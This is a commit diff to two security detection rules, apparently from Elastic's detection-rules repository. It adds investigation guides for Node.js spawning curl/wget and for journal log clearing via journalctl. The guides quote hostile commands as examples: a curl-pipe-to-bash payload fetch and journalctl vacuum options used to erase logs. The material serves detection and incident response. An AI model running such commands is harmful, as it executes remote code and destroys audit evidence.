Monthly Schema Updates (#5187)
This commit is contained in:
shashank-elastic
@@ -2,7 +2,7 @@
|
||||
creation_date = "2025/09/18"
|
||||
integration = ["endpoint"]
|
||||
maturity = "production"
|
||||
updated_date = "2025/09/18"
|
||||
updated_date = "2025/10/06"
|
||||
|
||||
[rule]
|
||||
author = ["Elastic"]
|
||||
@@ -16,6 +16,36 @@ index = ["logs-endpoint.events.process*"]
|
||||
language = "eql"
|
||||
license = "Elastic License v2"
|
||||
name = "Curl or Wget Spawned via Node.js"
|
||||
note = """## Triage and analysis
|
||||
|
||||
> **Disclaimer**:
|
||||
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
|
||||
|
||||
### Investigating Curl or Wget Spawned via Node.js
|
||||
|
||||
This rule flags Node.js launching curl or wget, directly or via a shell, a common technique to fetch payloads and enable command-and-control. Attackers often abuse child_process in Node apps to run "curl -sL http://host/payload.sh | bash," pulling a second stage from a remote host and executing it immediately under the guise of legitimate application activity.
|
||||
|
||||
### Possible investigation steps
|
||||
|
||||
- Pull the full process tree and command line to extract URLs/domains, flags (e.g., -sL, -O, --insecure), and identify whether the output is piped into an interpreter, indicating immediate execution risk.
|
||||
- Correlate with file system activity to find newly created or modified artifacts (e.g., in /tmp, /var/tmp, /dev/shm, or the app directory), then hash and scan them and check for follow-on executions.
|
||||
- Pivot to network telemetry to enumerate connections around the event from both Node.js and the child process, assessing destination reputation (IP/domain, ASN, geo, cert/SNI) against approved update endpoints.
|
||||
- Trace the initiating Node.js code path and deployment (child_process usage such as exec/spawn/execFile), and review package.json lifecycle scripts and recent npm installs or postinstall hooks for unauthorized download logic.
|
||||
- Verify user and runtime context (service account/container/pod), inspect environment variables like HTTP(S)_PROXY/NO_PROXY, and check whether credentials or tokens were passed to curl/wget to assess exposure.
|
||||
|
||||
### False positive analysis
|
||||
|
||||
- A legitimate Node.js service executes curl or wget to retrieve configuration files, certificates, or perform health checks against approved endpoints during startup or routine operation.
|
||||
- Node.js install or maintenance scripts use a shell with -c to run curl or wget and download application assets or updates, triggering the rule even though this aligns with expected deployment workflows.
|
||||
|
||||
### Response and remediation
|
||||
|
||||
- Immediately isolate the affected host or container, stop the Node.js service that invoked curl/wget (and any parent shell), terminate those processes, and block the exact URLs/domains/IPs observed in the command line and active connections.
|
||||
- Quarantine and remove any artifacts dropped by the downloader (e.g., files in /tmp, /var/tmp, /dev/shm or paths specified by -O), delete added cron/systemd entries referencing those files, and revoke API tokens or credentials exposed in the command line or headers.
|
||||
- Escalate to full incident response if output was piped to an interpreter (curl ... | bash or wget ... | sh), if --insecure/-k or self-signed endpoints were used, if unknown external infrastructure was contacted, or if secrets were accessed or exfiltrated.
|
||||
- Rebuild and redeploy the workload from a known-good image, remove the malicious child_process code path from the Node.js application, restore validated configs/data, rotate any keys or tokens used by that service, and verify no further curl/wget spawns occur post-recovery.
|
||||
- Harden by removing curl/wget from runtime images where not required, enforcing egress allowlists for the service, constraining execution with AppArmor/SELinux/seccomp and least-privilege service accounts, and adding CI/CD checks to block package.json postinstall scripts or code that shells out to downloaders.
|
||||
"""
|
||||
risk_score = 21
|
||||
rule_id = "d9af2479-ad13-4471-a312-f586517f1243"
|
||||
setup = """## Setup
|
||||
@@ -50,6 +80,7 @@ tags = [
|
||||
"Use Case: Threat Detection",
|
||||
"Tactic: Command and Control",
|
||||
"Data Source: Elastic Defend",
|
||||
"Resources: Investigation Guide",
|
||||
]
|
||||
timestamp_override = "event.ingested"
|
||||
type = "eql"
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
creation_date = "2025/10/01"
|
||||
integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
|
||||
maturity = "production"
|
||||
updated_date = "2025/10/01"
|
||||
updated_date = "2025/10/06"
|
||||
|
||||
[rule]
|
||||
author = ["Elastic"]
|
||||
@@ -24,6 +24,37 @@ index = [
|
||||
language = "eql"
|
||||
license = "Elastic License v2"
|
||||
name = "Attempt to Clear Logs via Journalctl"
|
||||
note = """## Triage and analysis
|
||||
|
||||
> **Disclaimer**:
|
||||
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
|
||||
|
||||
### Investigating Attempt to Clear Logs via Journalctl
|
||||
|
||||
This detection flags attempts to purge systemd journal logs by invoking journalctl with vacuum options, which attackers use to erase evidence and impede investigations. A common pattern is a compromised user escalating to root and immediately running sudo journalctl --vacuum-time=1s or --vacuum-size=1M, sometimes via a script or cron job, to rapidly truncate the journal across all boots and hide prior execution traces.
|
||||
|
||||
### Possible investigation steps
|
||||
|
||||
- Enrich with user/UID, effective privileges, parent and command-line, session/TTY, and origin (SSH IP or local), and determine if execution came from a scheduled job (cron/systemd timer) or a script.
|
||||
- Quantify destructiveness by extracting the exact vacuum parameter value(s) and immediately checking journal state (journalctl --disk-usage and --list-boots) and /var/log/journal size/mtime to see how much history was removed.
|
||||
- Inspect configuration and persistence paths for intentional log suppression, including recent changes in /etc/systemd/journald.conf (Storage=volatile, SystemMaxUse, SystemMaxFileSize, MaxRetentionSec) and any new systemd units or scripts invoking journalctl vacuum.
|
||||
- Correlate the vacuum timestamp with preceding activity to identify what might be concealed (privilege escalation, new accounts, sudoers edits, suspicious binaries), using auditd/EDR telemetry and shell history to rebuild the timeline.
|
||||
- Verify remote log forwarding and SIEM ingestion for this host, compare gaps around the vacuum time, and recover pre-vacuum events from central storage to assess impact and intent.
|
||||
|
||||
### False positive analysis
|
||||
|
||||
- A sysadmin or maintenance script ran journalctl --vacuum-time or --vacuum-size to reclaim space on a host under log disk pressure, which should correlate with low-free-space alerts, approved retention policy, and a scheduled systemd timer or cron job.
|
||||
- OS provisioning or image-preparation steps vacuumed the journal with journalctl --vacuum-files to sanitize logs before snapshotting, typically a one-time root action occurring near installation and matching documented build procedures.
|
||||
|
||||
### Response and remediation
|
||||
|
||||
- Immediately kill any active journalctl vacuum invocation (e.g., pkill -x journalctl), lock or remove sudo for the initiating user, and network-quarantine the host to prevent further tampering.
|
||||
- Remove persistence by disabling systemd units/timers and cron jobs that call "journalctl --vacuum-*", inspecting /etc/systemd/system/* for ExecStart=journalctl vacuum and /etc/crontab, /etc/cron.*, and user crontabs, then deleting the offending scripts.
|
||||
- Recover logging by setting Storage=persistent and policy-compliant SystemMaxUse/SystemMaxFileSize/MaxRetentionSec in /etc/systemd/journald.conf, restarting systemd-journald, and backfilling missing events from central log archives.
|
||||
- Harden by enabling remote forwarding (ForwardToSyslog=yes and rsyslog/syslog-ng to SIEM), adding auditd rules to alert on "journalctl --vacuum-*", and tightening sudoers to require MFA and record command I/O for journalctl on critical hosts.
|
||||
- Preserve evidence by archiving remaining /var/log/journal entries, journald.conf and its mtime, modified unit files under /etc/systemd/system, and shell/auth logs, and capture a disk snapshot before making further changes.
|
||||
- Escalate to incident response if root executed "journalctl --vacuum-time/size/files" outside a documented maintenance window, if Storage=volatile was set or retention reduced below policy, or if the same actor performed vacuums on multiple hosts within 24 hours.
|
||||
"""
|
||||
risk_score = 21
|
||||
rule_id = "09073bf4-a8ea-4bce-9fd5-2bb56b4d31f4"
|
||||
setup = """## Setup
|
||||
@@ -62,6 +93,7 @@ tags = [
|
||||
"Data Source: Auditd Manager",
|
||||
"Data Source: Crowdstrike",
|
||||
"Data Source: SentinelOne",
|
||||
"Resources: Investigation Guide",
|
||||
]
|
||||
timestamp_override = "event.ingested"
|
||||
type = "eql"
|
||||
|
||||
Reference in New Issue
Block a user